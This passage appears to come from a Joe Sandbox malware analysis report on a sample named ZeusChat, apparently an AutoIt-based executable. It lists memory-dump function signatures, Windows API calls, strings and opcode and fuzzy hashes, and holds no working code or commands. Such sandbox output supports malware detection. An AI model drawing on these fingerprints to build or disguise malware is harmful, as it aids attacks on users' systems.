• Opcode Fuzzy Hash: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
• Instruction Fuzzy Hash: F651543694A68681EB60DB15D89437DB7A2EB84B94FAC4071CA4D07764CFBDE84AC720
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
• Instruction ID: cf889e0c010badfc38b46061ba2f7f9ca825d29f8f2cfa7edb5fd29c106e19d7
• Opcode Fuzzy Hash: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
• Instruction Fuzzy Hash: D7314F3192A7418AF750AB01AC8433AB7A1FB94B84FDC4135D64D47658DFBDE84ACB10
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
• Instruction ID: bf15770ed6aa909af178d7d11885f346cb431b0a367a5356ae04f548a184e962
• Opcode Fuzzy Hash: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
• Instruction Fuzzy Hash: 5811C462E0E60B81F65C3224DE5E37591416FB1360FAD4630E6AD469DACEDCA84CC121
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
• String ID:
• API String ID: 2117695475-0
• Opcode ID: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
• Instruction ID: 4f38eaf9db12b7e4d1461880126856d176f1016bb3eaa9691438e1f3ff38d53f
• Opcode Fuzzy Hash: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
• Instruction Fuzzy Hash: 3E11AF50E0F15746FA8873B1EE1A2B896865F61320FCC0432E94D5A9D3EDDEB84DC636
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
• Instruction ID: d1920ecbc69d17158e829b057d9707c9bc392ebc419792e1eec861a35fdc6f52
• Opcode Fuzzy Hash: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
• Instruction Fuzzy Hash: 7001B530B1EA0282EB15B730ACA513DD321EF95780F9C0135D10F61564DFACE88EC720
APIs
• EnterCriticalSection.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF752080774
• TerminateThread.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF75208077F
• WaitForSingleObject.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF75208078D
• ~SyncLockT.VCCORLIB ref: 00007FF752080796
  • Part of subcall function 00007FF75207FF10: CloseHandle.KERNEL32(?,?,?,00007FF75208079B,?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF75207FF21
• LeaveCriticalSection.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF7520807A2
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
• String ID:
• API String ID: 3142591903-0
• Opcode ID: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
• Instruction ID: 9db199c4bd6b980bee8bd66cb32caea853cb3feaa22852e458476765983ee793
• Opcode Fuzzy Hash: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
• Instruction Fuzzy Hash: DD015A36A09A5587E790AF15F84022EB370FB88B94F984031DB8E43B54CF7CD89AC710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611280651-0
                                                                                                      • Opcode ID: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                      • Instruction ID: df18e25a4dc8c3430af3a16cc77a3cfb61ed5a792ef04a5bc41270e10351ad13
                                                                                                      • Opcode Fuzzy Hash: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                      • Instruction Fuzzy Hash: FC017121B1E64682EA257B209D8423CA261EF54B74F981734C23D02AD1DFBCE85DC310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2625713937-0
                                                                                                      • Opcode ID: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                      • Instruction ID: 8b59929af7f6b921efb176641339ad7e1e7f005caddceb419e49345077839c88
                                                                                                      • Opcode Fuzzy Hash: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                      • Instruction Fuzzy Hash: A4015E71D2A68695F6647B10FD8473AA762AF04B85F9C4530C51D06269DFFEA48DC320
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF752004082
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF752004090
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040A0
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040B0
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040BE
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040CC
                                                                                                        • Part of subcall function 00007FF7520040DC: RegisterWindowMessageW.USER32(?,?,?,00007FF752004F68), ref: 00007FF752004146
                                                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75200106D), ref: 00007FF752005042
                                                                                                      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75200106D), ref: 00007FF7520050C8
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75200106D), ref: 00007FF75204B336
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                      • String ID: AutoIt
                                                                                                      • API String ID: 1986988660-2515660138
                                                                                                      • Opcode ID: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                      • Instruction ID: 9793f52c3f6f22ebd45cbea040a47dbdbaedce27d5b6e3eae05225eeba0e97fc
                                                                                                      • Opcode Fuzzy Hash: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                      • Instruction Fuzzy Hash: 77C1C471D9AB4385F640AB14ACC007AF7A6BF94740FD8423AD49D42668DFFCA15AC7A0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: $*
                                                                                                      • API String ID: 3215553584-3982473090
                                                                                                      • Opcode ID: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                      • Instruction ID: e5615c6a8a6bd2427d8f57f325357d73afc6b43f9c61be0797553d1df0ca9e53
                                                                                                      • Opcode Fuzzy Hash: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                      • Instruction Fuzzy Hash: 3D61837290E35286E765BE24C84437CB7A0EB15B48FDC1237CA5E46199CFAEE48DC721
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID: !$asin
                                                                                                      • API String ID: 1156100317-2188059690
                                                                                                      • Opcode ID: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                      • Instruction ID: f960023c4313fa2e9e8e40d372fb7e062b03ab1534167d1aefad94c64aa867c5
                                                                                                      • Opcode Fuzzy Hash: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                      • Instruction Fuzzy Hash: 7E61E422C2DF8589E2639B385C1137AD364BFB63D0F958332E95E35A65DF6CE086C610
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                      • String ID: P
                                                                                                      • API String ID: 135850232-3110715001
                                                                                                      • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction ID: 72207feaa6320f156ebda51d935ffe0c743231a470ae84eb2a80c0f1e8b982b6
                                                                                                      • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction Fuzzy Hash: 32419332A0569185EB60FB15C8047BDA761FB84BA0F9D8231EA6D077D1DF7DD849C720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                      • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction ID: d3c3125b67ee13db6c71d79d0904c62cec6264a4e6e014a6ac7001e85415174a
                                                                                                      • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction Fuzzy Hash: F741C522B1EA4582D760EF25E8443B9B7A0FB98B94F884131EE4D87794DFBCE449C750
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long
                                                                                                      • String ID: SysTreeView32
                                                                                                      • API String ID: 847901565-1698111956
                                                                                                      • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction ID: f5d6eb37b6daa8896788b839f2a8a083f024ea1ad992978ce780d38e5b7bffad
                                                                                                      • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction Fuzzy Hash: CE415032A0A7C186E770EB14E844B9AB7A1F784764F544335DAAC03B99CF7CD849CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                                                      • String ID: SysMonthCal32
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                      • String ID: msctls_updown32
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                      • String ID: Listbox
                                                                                                      APIs
                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF75204B0D8
                                                                                                        • Part of subcall function 00007FF752005A50: GetFullPathNameW.KERNEL32(?,00007FF752005A3D,?,00007FF752004C50,?,?,?,00007FF75200109E), ref: 00007FF752005A7B
                                                                                                        • Part of subcall function 00007FF752004694: GetLongPathNameW.KERNEL32(?,00007FF752004741,?,00007FF752003C00,?,?,?,?,?,00007FF752002BC1), ref: 00007FF7520046B8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: msctls_trackbar32
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                      • String ID: csm
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF752025AC3
                                                                                                      Similarity
                                                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                      • API String ID: 2574300362-192647395
                                                                                                      • Opcode ID: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction ID: 15eb8f177d317bee9608cb4729e82b62c66fc8c54bf930d2bf9b0947ae07a5fb
                                                                                                      • Opcode Fuzzy Hash: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction Fuzzy Hash: CEE0ED65907B0681EF29AB14E894378A3A0FB08B44FCC0474C91D55354EFFCD6ADC350
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction ID: cf2a53d4dd80fcf5f91a42e173ed6e37a9ffa0d2d45ba4d3e62159f015f3bdea
                                                                                                      • Opcode Fuzzy Hash: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction Fuzzy Hash: B2D14667B05A9686EB14AF26C8442AC77B0FB88F98B554422DF0E57B54CF79E848C324
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
